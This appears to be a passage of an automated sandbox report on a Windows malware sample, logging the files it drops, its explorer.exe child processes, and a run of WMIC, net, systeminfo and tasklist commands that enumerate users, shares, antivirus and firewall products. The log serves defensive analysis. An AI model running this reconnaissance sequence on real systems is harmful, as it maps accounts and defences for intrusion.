                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domain
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net share
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C35.exe C:\Users\user\AppData\Local\Temp\C35.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\451E.exe C:\Users\user\AppData\Local\Temp\451E.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net shareJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
                  Source: C:\Windows\System32\net.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
